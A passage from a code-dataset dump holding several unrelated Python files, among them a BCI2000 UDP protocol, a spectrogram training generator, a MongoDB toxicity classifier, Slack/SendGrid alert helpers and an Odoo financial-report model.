'Temp3pm': isi[18], 'RainToday': isi[19], 'RISK_MM': isi[20]})\n\n csvFile.close()\n num += 1\n if(i+1) > 141999:\n # Menulis file lengkap\n csvFile = open(\"model_\" +str(num)+\".csv\" ,'w')\n\n csvWriter = csv.DictWriter(csvFile, fieldnames=fieldnames)\n csvWriter.writeheader()\n for isi in msg_to_csv:\n csvWriter.writerow({'MinTemp': isi[0], 'MaxTemp': isi[1], 'Rainfall': isi[2], 'Evaporation': isi[3], 'Sunshine': isi[4], 'WindGustDir': isi[5], 'WindGustSpeed': isi[6], 'WindDir9am': isi[7], 'WindDir3pm': isi[8], 'WindSpeed9am': isi[9], 'WindSpeed3pm': isi[10], 'Humidity9am': isi[11], 'Humidity3pm': isi[12], 'Pressure9am': isi[13], 'Pressure3pm': isi[14], 'Cloud9am': isi[15], 'Cloud3pm': isi[16], 'Temp9am': isi[17], 'Temp3pm': isi[18], 'RainToday': isi[19], 'RISK_MM': isi[20]}) \n csvFile.close()\n print(str(i+1)+ '--' + str(message['number']) + '\\nPanjang:' + str(len(msg_to_csv)) +'\\n======================')\n##########################################################################################\n\n\n#+ '\\nwaktu: ' + str(datetime.datetime.now().time())\n\n\n\n\n\n\n","sub_path":"Clustering API/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"35595262","text":"#coding:utf-8\n\nimport socket\nfrom struct import 
pack,unpack\n\n\"\"\"\nauthor:mrtang\ndate:2017.7\nversion:1.0\nemail:mrtang@nudt.edu.cn\n\nThis script defines communication protocol for BCI2000 platform communicates with lower users.\n\"\"\"\n\nclass MRVserver():\n def __init__(self,addr):\n self.ser = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n\n def encode(self,head,op,seq):\n seq.insert(0,len(seq))\n sstr = [pack('b',item) for item in seq]\n return head+op+sstr\n\n def P3Com(self,op,seq):\n if op in ['on','off','res']:\n if op == 'on': op = 'onn'\n buf = self.encode('p300',op,seq)\n self.ser.sendto(buf,addr)\n return 1\n else:\n return 0\n\n def SsvepCom(self,op,seq):\n if op in ['on','off','res']:\n if op == 'on': op = 'onn'\n buf = self.encode('svep',op,seq)\n self.ser.sendto(buf,addr)\n return 1\n else:\n return 0\n\nclass MRVclient():\n def __init__(self,addr):\n self.ser = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n self.ser.bind(addr)\n self.ser.setblocking(0)\n\n self.cmd = {'Obj':'p300','Operate':'on','data':[]}\n\n def update(self):\n try:\n buf = self.ser.recv(512)\n self.cmd['Effective']=1\n head = buf[0:4]\n op = buf[4:7]\n n = unpack('b',buf[7])[0]\n seq = list(unpack('b'*n,buf[7:7+n]))\n if head in ['p300','svep'] and op in ['onn','off','res']:\n self.cmd['Obj']=head\n self.cmd['Operate']=op\n self.cmd['data']=seq\n return 1\n else:\n return 0\n except:\n return 0","sub_path":"已完成/ComProtocol.py","file_name":"ComProtocol.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"576814673","text":"import logging\nimport copy\nimport random \n# from numpy import array\nimport numpy as np\nfrom numpy.random import uniform\nimport gc\n\nfrom trainer.ellington_library import EllingtonLibrary, Track\nfrom trainer.spectrogram import Spectrogram, RangeError\n\nclass TrackIterator: \n track = None\n spect = None\n def __init__(self, track, folder=\"data/smnp/\", start=60, end=180, length=10, samples=10): \n # Set the values, and load the spectrogram\n self.track = track\n self.spect = Spectrogram(track)\n self.folder = folder\n self.spect.load(self.folder)\n\n # Set the config values\n self.start = start \n self.end = end\n self.length = length\n self.samples = samples\n\n def iter(self):\n # Iterate over the range, and emit samples:\n i = 0 \n # Iterate with a while loop, as any iteration might fail\n while i < self.samples: \n s = uniform(self.start, self.end)\n try:\n print(\"Yielding data in range (\" + str(s) + \",\" + str(s+ self.length)+\")\")\n data = self.spect.interval(s)\n if data.shape == (256, 1720):\n i = i + 1\n yield (self.track.bpm, data)\n except RangeError: \n print(\"Random range was invalid - continuing to try again\")\n print(\"Yielded \" + str(self.samples) + \" samples.\")\n\n\nclass LibraryIterator: \n library = None\n \n # Initialise a generator from a library\n def __init__(self, library, folder=\"data/smnp/\", start=60, end=180, length=10, samples=10, iterations=10, batchsize=10): \n # Make a deep copy of the library so that we can shuffle it. 
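# (without the deep copy, random.shuffle below would reorder the caller's library too)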
\n self.library = copy.deepcopy(library)\n # Cache the config values\n self.folder = folder\n self.start = start \n self.end = end \n self.length = length \n self.samples = samples\n self.iterations = iterations\n self.batchsize = batchsize\n \n def len(self): \n return len(self.library.tracks) * self.samples * self.iterations / self.batchsize\n\n def shuffle(self): \n print(\"Shuffling library\")\n random.shuffle(self.library.tracks)\n \n def iter(self): \n # Go across iterations\n for i in range(0, self.iterations):\n # Start by shuffling the library\n self.shuffle()\n # Iterate over the tracks, and get 20 random samples. \n for t in self.library.tracks:\n print(\"Yielding spectrogram data for \" + t.trackname)\n ti = TrackIterator(t, self.folder, self.start, self.end, self.length, self.samples)\n # Generate random samples from the track, and yield them\n for s in ti.iter(): \n yield s \n del ti\n\n def batch(self): \n # Yield an iterator over batches of samples \n # Iterate over the iterator: \n ix = 0\n inputs = []\n targets = [] \n for s in self.iter(): \n target = float(s[0]) / 400.0\n targets.append(target)\n\n inp = s[1]\n (w, h) = inp.shape\n maxv = np.max(np.abs(inp))\n data = np.reshape(inp, (w, h, 1)) / maxv\n inputs.append(data)\n\n ix = ix + 1\n\n if( ix == self.batchsize): \n inputs_arr = np.stack(inputs, axis=0)\n targets_arr = np.stack(targets, axis=0)\n \n print(\"Yielding an array of \" + str(inputs_arr.shape) + \" samples\")\n\n yield inputs_arr, targets_arr\n\n del inputs \n del targets\n gc.collect()\n inputs = []\n targets = [] \n ix = 0\n \n\n","sub_path":"trainer/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"77634811","text":"# this will classify all issues and comments as toxic\n# in mongodb, starting with the newest\nimport logging\n# logging.basicConfig(filename='toxicity_issues.log',level=logging.INFO)\n# logging.basicConfig(level=logging.INFO)\n\nimport config\n\nVERSION = \"v1\"\nTABLE_PREFIX = \"christian_toxic_\"\n\nlogging.info(\"loading\")\nimport pickle\nimport pymongo\nimport time\n\n\nlogging.info(\"loading model\")\nmodel = pickle.load(open(\"pretrained_model.p\",\"rb\"))\nimport suite\n\n\nlogging.info(\"connecting to database\")\ndef connect_to_database():\n\tmongo_name = config.mongo[\"user\"]\n\tmongo_password = config.mongo[\"passwd\"]\n\n\t# Connect to the Mongo Database\n\tclient = pymongo.MongoClient()\n\tdb = client[config.mongo[\"db\"]]\n\tdb.authenticate(name=mongo_name, password=mongo_password)\n\treturn db\ndb = connect_to_database()\n\nlogging.info(\"starting\")\n\n\n\n\n\ndef get_next_date(table): # updated_at date as string\n\tr = db[TABLE_PREFIX+table].find_one(\n\t\t\tfilter= {\"toxicity.\"+VERSION: {\"$exists\": 0}}, \n\t\t\tsort= [(\"updated_at\", -1)]\n\t\t )\n\treturn r[\"updated_at\"]\n\ndef claim_next(table): # [id, updated_at, time]\n\tstart = time.time()\n\tr = db[TABLE_PREFIX+table].find_one_and_update(\n\t\t\tfilter= {\"toxicity.\"+VERSION: {\"$exists\": 0}}, \n\t\t\tsort= [(\"updated_at\", -1)], \n\t\t\tupdate= {\"$set\":{\"toxicity.\"+VERSION+\".in_progress\": 1 }} \n\t\t )\n\treturn [r[\"_id\"], r[\"updated_at\"], time.time() - start]\n\ndef get_text(table, id): # [text, time]\n\tstart = time.time()\n\ti = db[table].find_one({\"_id\": id}, {\"title\":1, \"body\":1})\n\ttext = \"\"\n\tif \"title\" in i:\n\t\ttext += str(i[\"title\"]) + \": \"\n\tif \"body\" in i:\n\t\ttext += 
str(i[\"body\"])\n\t# print(text)\n\treturn [text, time.time() - start]\n\n\ndef update_db(table, id, new_data):\n\tstart = time.time()\n\tdb[TABLE_PREFIX+table].update({\"_id\": id},{ \"$set\": new_data })\n\treturn time.time() - start\n\ndef compute_prediction_report(text):\n\tstart = time.time()\n\t# score the issue's text\n\tscore = suite.score_toxicity(text, model)\n\tresult = { \n\t\t\t\"score\": score[0].item(), \n\t\t\t\"orig\" : {\"score\": score[0].item(), \"persp\": score[1], \"polite\": score[2]},\t\t\t\n\t\t\t}\n\n\t# if toxic, look at alternatives\n\tif score[0]==1:\n\t\talt_text = suite.clean_text(text)\n\t\tif len(alt_text)==0:\n\t\t\tprint(\" == found toxic issue, no alternatives\")\n\t\telse:\n\t\t\tprint(\" == found toxic issue, exploring \"+str(len(alt_text))+\" alternatives\")\n\t\t\tisToxic = True\n\t\t\tfor a in alt_text:\n\t\t\t\tif isToxic:\n\t\t\t\t\tscore = suite.score_toxicity(text, model)\n\t\t\t\t\tif score[0] == 0:\n\t\t\t\t\t\tprint(\" === found nontoxic alternative\")\n\t\t\t\t\t\tisToxic=False\n\t\t\t\t\t\tresult[\"score\"]=0\n\t\t\t\t\t\tresult[\"alt\"]={\"text\":a,\"score\": score[0].item(), \"persp\": score[1], \"polite\": score[2]}\n\t\t\tif not isToxic:\n\t\t\t\tresult[\"alt_tried\"]=len(alt_text)\n\treturn [result, time.time() - start]\n\ndef process_one_item(table):\n\t# grab the most recent issue to process\n\t[issue_id, d, t1] = claim_next(table)\n\tprint(table, issue_id, d)\n\n\t# get the text\n\t[text, t2] = get_text(table, issue_id)\n\n\t# score the text\n\t[score_report, t3] = compute_prediction_report(text)\n\tresult = {\"toxicity.\"+VERSION: score_report}\n\n\t# write results to db\n\tt4=update_db(table,issue_id,result)\n\t# print(\"db time\", t1, t2, t4, \"scoring time\", t3)\n\ndef process_100_items(table):\n\tfor x in range(0, 99):\n\t\tprocess_one_item(table)\n\nwhile True:\n\tnext_i = get_next_date(\"issues\")\n\tnext_ic = get_next_date(\"issue_comments\")\n\tif (next_i > next_ic):\n\t\tprocess_100_items(\"issues\")\n\telse:\n\t\tprocess_100_items(\"issue_comments\")\n\t","sub_path":"src/classify_comments.py","file_name":"classify_comments.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"597764612","text":"import json\n\nimport requests\nimport slack\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import *\n\n\ndef send_slack_alert(wekbook_url, web_api_token, dest_channel, query, job_id, user_email, cost, gigabytes_billed,\n customize_details):\n try:\n message_blocks = [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": \"The following query has processed large amount of data:\"\n }\n },\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": \"Query Syntax ```\" + str(query) + \"```\"\n }\n },\n {\n \"type\": \"section\",\n \"fields\": [\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Job ID *\" + str(job_id) + \"*\"\n },\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Query User *\" + str(user_email) + \"*\"\n },\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Gigabytes Billed *\" + str(truncate(gigabytes_billed, 2)) + \"*\"\n },\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Query Cost *$\" + str(truncate(cost, 2)) + \"*\"\n }\n ]\n }\n ]\n\n if wekbook_url:\n send_slack_alert_webhook(wekbook_url, dest_channel, message_blocks)\n\n if web_api_token:\n send_slack_alert_web_api(web_api_token, dest_channel, message_blocks, user_email)\n except Exception as e:\n print(\"Failed to send slack 
alert. \\n\")\n print(e)\n\n\ndef send_slack_alert_webhook(wekbook_url, dest_channel, blocks):\n print(\"sending slack webhook alert\")\n try:\n data = {\"blocks\": blocks, \"channel\": dest_channel}\n\n requests.post(wekbook_url, data=json.dumps(\n data), headers={'Content-Type': 'application/json'})\n except Exception as e:\n print(\"Failed to send slack alert. \\n\")\n print(e)\n\n\ndef send_slack_alert_web_api(web_api_token, dest_channel, message_blocks, user_email):\n print(\"sending slack web api alert\")\n client = slack.WebClient(web_api_token)\n try:\n\n client.chat_postMessage(channel=dest_channel, blocks=message_blocks)\n\n except Exception as e:\n print(\"Failed to send slack alert to channel: \" + dest_channel)\n print(e)\n\n try:\n\n slack_user = client.users_lookupByEmail(email=user_email)\n if slack_user:\n user_id = slack_user.data.get(\"user\").get(\"id\")\n client.chat_postMessage(channel=user_id, blocks=message_blocks)\n\n except Exception as e:\n print(\"Failed to send slack alert to user: \" + user_email)\n print(e)\n\n\ndef send_email_alert(sendgrid_api_key, sender, query, job_id, user_email, cc_list, total_cost, giga_bytes_billed,\n details):\n email_body = \"Hey,
    The following query has processed a large amount of data:\" \\\n + \"
    \" + query + \"\" \\\n + \"
    Job ID \" + job_id + \" Query User \" + user_email + \"\" \\\n + \"
    \" + \"Gigabytes Billed \" + str(truncate(giga_bytes_billed, 2)) \\\n + \" Query Cost $\" + str(truncate(total_cost, 2)) + \"\"\n\n message = Mail(\n from_email=sender,\n to_emails=user_email,\n subject='BigQuery job crossed threshold',\n html_content='' + email_body + '')\n for cc_email in cc_list:\n message.personalizations[0].add_cc(Email(cc_email))\n try:\n sg = SendGridAPIClient(sendgrid_api_key)\n sg.send(message)\n except Exception as e:\n print(\"Failed to send email alert. \\n\")\n print(e)\n\n\ndef truncate(f, n):\n s = '{}'.format(f)\n if 'e' in s or 'E' in s:\n return '{0:.{1}f}'.format(f, n)\n i, p, d = s.partition('.')\n return '.'.join([i, (d + '0' * n)[:n]])\n","sub_path":"alert_channels.py","file_name":"alert_channels.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"482148889","text":"'''\nCreated on Mar 30, 2018\n\n@author: abelit\n'''\n\ndef runServiceBaseNT():\n # Service running backgound based windows \n try: \n import win32serviceutil\n import win32service\n import win32event\n import servicemanager\n import socket\n import time\n import sys\n except ImportError as e:\n print(e)\n\n\n class DBReportService(win32serviceutil.ServiceFramework):\n _svc_name_ = 'DBReportService'\n _svc_display_name_ = 'DBReportService'\n \n def __init__(self, args):\n win32serviceutil.ServiceFramework.__init__(self, args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n \n socket.setdefaulttimeout(60)\n self.isAlive = True\n \n def SvcStop(self):\n self.isAlive = False\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n \n def SvcDoRun(self):\n self.isAlive = True\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, \n servicemanager.PYS_SERVICE_STARTED, (self._svc_name_, ''))\n while self.isAlive: \n wfile()\n time.sleep(3)\n\n win32event.WaitForSingleObject(self.hWaitStop, win32event.INFINITE)\n \n def main(self):\n #i = 0\n while self.isAlive: \n wfile()\n time.sleep(3)\n\n\n return DBReportService\n\n\ndef wfile():\n f = open('C:\\\\Users\\\\Abelit\\\\Desktop\\\\demo.txt','a')\n\n f.write('hello abelit \\n')\n\n f.close()\n\n\nif __name__ == '__main__':\n print(runServiceBaseNT())","sub_path":"tests/testmodule.py","file_name":"testmodule.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"474408349","text":"import random\n\nhigh = 10\nanswer = random.randint(1, high)\nguss_loop = True\nwhile(guss_loop):\n guss = int(input(\"Please inter your guss: \"))\n if guss > answer:\n print(\"Please guess lower \")\n elif guss == 0:\n print(\"You are quiting \")\n break\n elif guss == answer:\n print(\"Congratulation You guss right number {} \".format(answer))\n guss_loop = False\n else:\n print(\"Please guess Higher\")\n\n\n\n","sub_path":"program flow control/while/whileChalenge.py","file_name":"whileChalenge.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"303784875","text":"import read_files\n\n\nclass Database():\n # 原始数据库类,用于存储所有的原始数据\n\n\n\n def __init__(self):\n # 构造函数,用于初始化数据库对象,将所有原始数据存储在data成员变量中\n self.data = read_files.read_files(\"../../../inputdata\")\n\n def extract_columns(self, sheet_name, fields):\n # 根据开发人员需求,可任意抽取某个sheet中的某些列数据,抽取的数据中不包含标题行\n ranges = ('传输告警', '动环告警', '无线告警', '核心网告警', 'OTN-板卡(CRD)', 
'OTN-激光器(OPM)',\n 'PTN-板卡(CRD)', 'PTN-激光器(OPM)', '核心网(MSS)', '核心网(MGW)', '核心网(HSS)',\n '核心网(SBC)', '无线(BSC)', '无线(4G小区)', 'sheet0', 'IP承载网-传输信息-IP中继',\n 'LTE核心网-链路', '传输电路的配置查询结果', '动力专业-动环专业内输出分路', '动力专业-跨专业输出分路',\n '无线专业-无线端口', '核心网-中继模板', 'UPS系统的配置查询结果', 'UPS设备的配置查询结果',\n '专用空调的配置查询结果', '交流配电柜的配置查询结果', '低压配电柜的配置查询结果',\n '其他设备的配置查询结果', '动环监控设备的配置查询结果', '发电机组的配置查询结果',\n '发电系统的配置查询结果', '变压器或调压器的配置查询结果', '变换设备的配置查询结果-湘潭无数据',\n '开关电源的配置查询结果', '开关电源系统的配置查询结果', '普通空调的配置查询结果',\n '直流配电柜的配置查询结果', '蓄电池组的配置查询结果', '高压配电柜的配置查询结果',\n '高压配电系统的配置查询结果', 'BBU的配置查询结果', 'BSC的配置查询结果', 'BTS的配置查询结果',\n 'E-NODEB的配置查询结果', 'E_UTRANCELL的配置查询结果', 'RNC的配置查询结果', 'RRU的配置查询结果',\n '天线的配置查询结果', '室内分布系统的配置查询结果', '小区的配置查询结果', '直放站的配置查询结果',\n '铁塔的配置查询结果', 'BGCF', 'CG', 'CTXAS公共资源', 'DNS&ENUM', 'ICSCF', 'IM-MGW', 'IMS HSS',\n 'ISBG', 'MGCF', 'MMTAS', 'PCSCF', 'SBC集团模板', 'SCSCF', 'HSS_BE', 'HSS_FE', 'HSS分布式', 'AP',\n 'ATCF', 'ATGW', 'MRFC', 'MRFP', 'PSBC', 'SCC AS', 'VOLTE AS', 'VOLTE TAS', 'LTE_CE模板',\n 'LTE_CG导入模板', 'LTE_DNS导入模板', 'DRA集团模板', 'LTE_FW导入模板', 'LTE_MME', 'LTE_PCRF-BE',\n 'LTE_PCRF', 'LTE_SAE_GW', 'LTE_SW导入模板', '业务处理单元', '信令处理单元', '智能网网络设备',\n '网元通用', 'MGW网元集团模板', 'SS网元集团模板', 'STP网元集团模板', '彩信中心(基础信息)',\n '彩信中心(系统信息)', '短信中心(基础信息)', '短信中心(系统信息)', '短信网关(基础信息)',\n '短信网关(系统信息)')\n\n if sheet_name not in ranges:\n raise IndexError(\"not found tablename: \" + tablename)\n return None\n\n col_names = list(self.data[sheet_name].columns)\n for field in fields:\n if field not in col_names:\n raise Exception(\"数据表: \" + sheetname + \" 中,不包含要提取的列 \"+field)\n return None\n return self.data[sheet_name].loc[:, fields]\n\n\n\nif __name__ == '__main__':\n result1 = Database()\n print(result1.extract_columns(sheetname=\"动环告警\", fields=(\"原始告警流水号\", \"厂家告警号\")))\n","sub_path":"com/chinamobile/cq/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"510739525","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\nimport base64\nfrom openerp.osv import osv\n\nfrom reportlab.lib.enums import TA_JUSTIFY\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.colors import magenta, red , black, white, blue, gray, Color, HexColor, PCMYKColor, PCMYKColorSep\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib.pagesizes import letter, A4, legal\nfrom reportlab.platypus import SimpleDocTemplate, Table, TableStyle\nfrom reportlab.lib import colors\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.platypus import Paragraph, Table\nfrom reportlab.lib.units import cm,mm\nfrom reportlab.lib.utils import simpleSplit\nfrom cgi import escape\n\nimport decimal\n\n\ndef dig_5(n):\n\treturn (\"%5d\" % n).replace(' ','0')\n\n\nclass consolidado_rm_resultado_mexicano_line(models.Model):\n\t_name = 'consolidado.rm.resultado.mexicano.line'\n\n\torden = fields.Float('Orden',required=True)\n\tconcepto = fields.Char('Concepto')\n\ttipo_cuenta = fields.Selection([('1','Ingreso'),('2','Costo o Gasto'),('3','Calculado'),('4','Ingresado'),('5','Texto Fijo')],'Tipo Cuenta')\n\t#tipo_cuenta = fields.Selection([('1','Disponible'),('2','Exigible'),('3','Realizable'),('4','Activo Fijo'),('5','Otros Activos FIjos'),('6','Activo Diferido'),('7','Activos Arrendamiento Financiero'),('8','Pasivo Circulante'),('9','Pasivo Fijo'),('10','Capital Contable'),('11','Deuda Intrinseca por 
Arredamiento')],'Tipo Cuenta',required=True)\n\tformula = fields.Char('Formula')\n\ttotal = fields.Char('Linea de Total')\n\tresaltado = fields.Boolean('Resaltado')\n\tbordes = fields.Boolean('Bordes')\n\n\t#monto_mes = fields.Float('Saldo',digits=(12,2))\n\tenero = fields.Float('Enero',digits=(12,2))\n\tfebrero = fields.Float('Febrero',digits=(12,2))\n\tmarzo = fields.Float('Marzo',digits=(12,2))\n\tabril = fields.Float('Abril',digits=(12,2))\n\tmayo = fields.Float('Mayo',digits=(12,2))\n\tjunio = fields.Float('Junio',digits=(12,2))\n\tjulio = fields.Float('Julio',digits=(12,2))\n\tagosto = fields.Float('Agosto',digits=(12,2))\n\tseptiembre = fields.Float('Septiembre',digits=(12,2))\n\toctubre = fields.Float('Octubre',digits=(12,2))\n\tnoviembre = fields.Float('Noviembre',digits=(12,2))\n\tdiciembre = fields.Float('Diciembre',digits=(12,2))\n\n\tporc_enero = fields.Float('Porcentaje Enero',digits=(12,2))\n\tporc_febrero = fields.Float('Porcentaje Febrero',digits=(12,2))\n\tporc_marzo = fields.Float('Porcentaje Marzo',digits=(12,2))\n\tporc_abril = fields.Float('Porcentaje Abril',digits=(12,2))\n\tporc_mayo = fields.Float('Porcentaje Mayo',digits=(12,2))\n\tporc_junio = fields.Float('Porcentaje Junio',digits=(12,2))\n\tporc_julio = fields.Float('Porcentaje Julio',digits=(12,2))\n\tporc_agosto = fields.Float('Porcentaje Agosto',digits=(12,2))\n\tporc_septiembre = fields.Float('Porcentaje Septiembre',digits=(12,2))\n\tporc_octubre = fields.Float('Porcentaje Octubre',digits=(12,2))\n\tporc_noviembre = fields.Float('Porcentaje Noviembre',digits=(12,2))\n\tporc_diciembre = fields.Float('Porcentaje Diciembre',digits=(12,2))\n\n\t@api.one\n\tdef get_acum_anio(self):\n\t\tself.acum_anio = self.enero + self.febrero + self.marzo + self.abril + self.mayo + self.junio + self.julio + self.agosto + self.septiembre + self.octubre + self.noviembre + self.diciembre\n\n\n\t@api.one\n\tdef get_acum_porc(self):\n\t\ttmp = ((self.enero*100.0) / self.porc_enero) if self.porc_enero != 0 else 0 \n\t\ttmp += ((self.febrero*100.0) / self.porc_febrero) if self.porc_febrero != 0 else 0\n\t\ttmp += ((self.marzo*100.0) / self.porc_marzo) if self.porc_marzo != 0 else 0\n\t\ttmp += ((self.abril*100.0) / self.porc_abril) if self.porc_abril != 0 else 0\n\t\ttmp += ((self.mayo*100.0) / self.porc_mayo) if self.porc_mayo != 0 else 0\n\t\ttmp += ((self.junio*100.0) / self.porc_junio) if self.porc_junio != 0 else 0\n\t\ttmp += ((self.julio*100.0) / self.porc_julio) if self.porc_julio != 0 else 0\n\t\ttmp += ((self.agosto*100.0) / self.porc_agosto) if self.porc_agosto != 0 else 0\n\t\ttmp += ((self.septiembre*100.0) / self.porc_septiembre) if self.porc_septiembre != 0 else 0\n\t\ttmp += ((self.octubre*100.0) / self.porc_octubre) if self.porc_octubre != 0 else 0\n\t\ttmp += ((self.noviembre*100.0) / self.porc_noviembre) if self.porc_noviembre != 0 else 0\n\t\ttmp += ((self.diciembre*100.0) / self.porc_diciembre) if self.porc_diciembre != 0 else 0\n\n\t\tself.acum_porc = ( (self.acum_anio * 100.0) / tmp ) if tmp != 0 else 0\n\n\n\tacum_anio = fields.Float('Acumulado Soles',compute=\"get_acum_anio\",digits=(12,2))\n\tacum_porc = fields.Float('Porcentaje Acumulado',compute=\"get_acum_porc\",digits=(12,2))\n\t##porcentaje_mes\n\n\n\tpadre = fields.Many2one('consolidado.rm.resultado.mexicano','Cabezera')\n\n\n\n\nclass consolidado_rm_resultado_mexicano(models.Model):\n\t_name= 'consolidado.rm.resultado.mexicano'\n\n\tfiscal_id = fields.Many2one('account.fiscalyear','Año Fiscal',required=True)\n\tperiodo_ini = 
fields.Many2one('account.period','Periodo',required=True)\n\ttipo_cambio = fields.Float('Tipo Cambio',digits=(12,3))\n\n\ttipo_cambio1 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio2 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio3 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio4 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio5 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio6 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio7 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio8 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio9 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio10 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio11 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio12 = fields.Float('Tipo Cambio',digits=(12,3))\n\n\tlineas = fields.One2many('consolidado.rm.resultado.mexicano.line','padre','Lineas')\n\n\t_rec_name = 'periodo_ini'\n\n\n\t@api.one\n\tdef traer_datos(self):\n\t\tt_i = self.env['rm.resultado.config.mexicano.line'].search([])\n\t\tif len(t_i) >0 :\n\t\t\tpass\n\t\telse:\n\t\t\traise osv.except_osv('Alerta!', \"No hay plantilla configurada\")\n\n\t\tfor i in self.lineas:\n\t\t\ti.unlink()\n\n\t\tfor i in t_i:\n\t\t\tvals = {\n\t\t\t\t'orden': i.orden, \n\t\t\t\t'concepto' : i.concepto,\n\t\t\t\t'tipo_cuenta' :i.tipo_cuenta,\n\t\t\t\t'formula' :i.formula,\n\t\t\t\t'total' :i.total,\n\t\t\t\t'resaltado' :i.resaltado,\n\t\t\t\t'bordes' :i.bordes,\n\t\t\t\t'enero' :0,\n\t\t\t\t'febrero' :0,\n\t\t\t\t'marzo' :0,\n\t\t\t\t'abril' :0,\n\t\t\t\t'mayo' :0,\n\t\t\t\t'junio' :0,\n\t\t\t\t'julio' :0,\n\t\t\t\t'agosto' :0,\n\t\t\t\t'septiembre' :0,\n\t\t\t\t'octubre' :0,\n\t\t\t\t'noviembre' :0,\n\t\t\t\t'diciembre' :0,\n\t\t\t\t'porc_enero' :0,\n\t\t\t\t'porc_febrero' :0,\n\t\t\t\t'porc_marzo' :0,\n\t\t\t\t'porc_abril' :0,\n\t\t\t\t'porc_mayo' :0,\n\t\t\t\t'porc_junio' :0,\n\t\t\t\t'porc_julio' :0,\n\t\t\t\t'porc_agosto' :0,\n\t\t\t\t'porc_septiembre' :0,\n\t\t\t\t'porc_octubre' :0,\n\t\t\t\t'porc_noviembre' :0,\n\t\t\t\t'porc_diciembre' :0,\n\t\t\t\t'padre': self.id,\n\t\t\t}\n\t\t\tself.env['consolidado.rm.resultado.mexicano.line'].create(vals)\n\n\n\t\tself.refresh()\n\n\n\n\t\tperiod_list = []\n\t\tnro_act = 1\n\t\tperiod_act = (\"%2d\"%nro_act).replace(' ','0') + '/' + self.fiscal_id.name\n\t\tnro_act = 2\n\t\tmkmk = self.env['account.period'].search( [('code','=',period_act)] )\n\t\tif len(mkmk)>0:\n\t\t\tperiod_list.append(mkmk[0])\n\n\t\twhile period_act != self.periodo_ini.code :\n\t\t\tperiod_act = (\"%2d\"%nro_act).replace(' ','0') + '/' + self.fiscal_id.name\n\t\t\tnro_act += 1\n\t\t\tmkmk = self.env['account.period'].search( [('code','=',period_act)] )\n\t\t\tif len(mkmk)>0:\n\t\t\t\tperiod_list.append(mkmk[0])\n\n\t\tfor i in period_list:\n\t\t\tt = self.env['rm.resultado.mexicano'].search( [('periodo_fin','=',i.id)] )\n\t\t\tif len(t)>0:\n\t\t\t\tt = t[0]\n\t\t\t\tfor line in self.lineas:\n\t\t\t\t\tfor j in self.env['rm.resultado.mexicano.line'].search([('orden','=',line.orden),('padre','=',t.id),('concepto','=',line.concepto),('tipo_cuenta','=',line.tipo_cuenta)]):\n\t\t\t\t\t\tif i.code.split('/')[0] == '01':\n\t\t\t\t\t\t\tline.enero = j.monto_mes\n\t\t\t\t\t\t\tline.porc_enero = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio1 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '02':\n\t\t\t\t\t\t\tline.febrero = j.monto_mes\n\t\t\t\t\t\t\tline.porc_febrero = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio2 = 
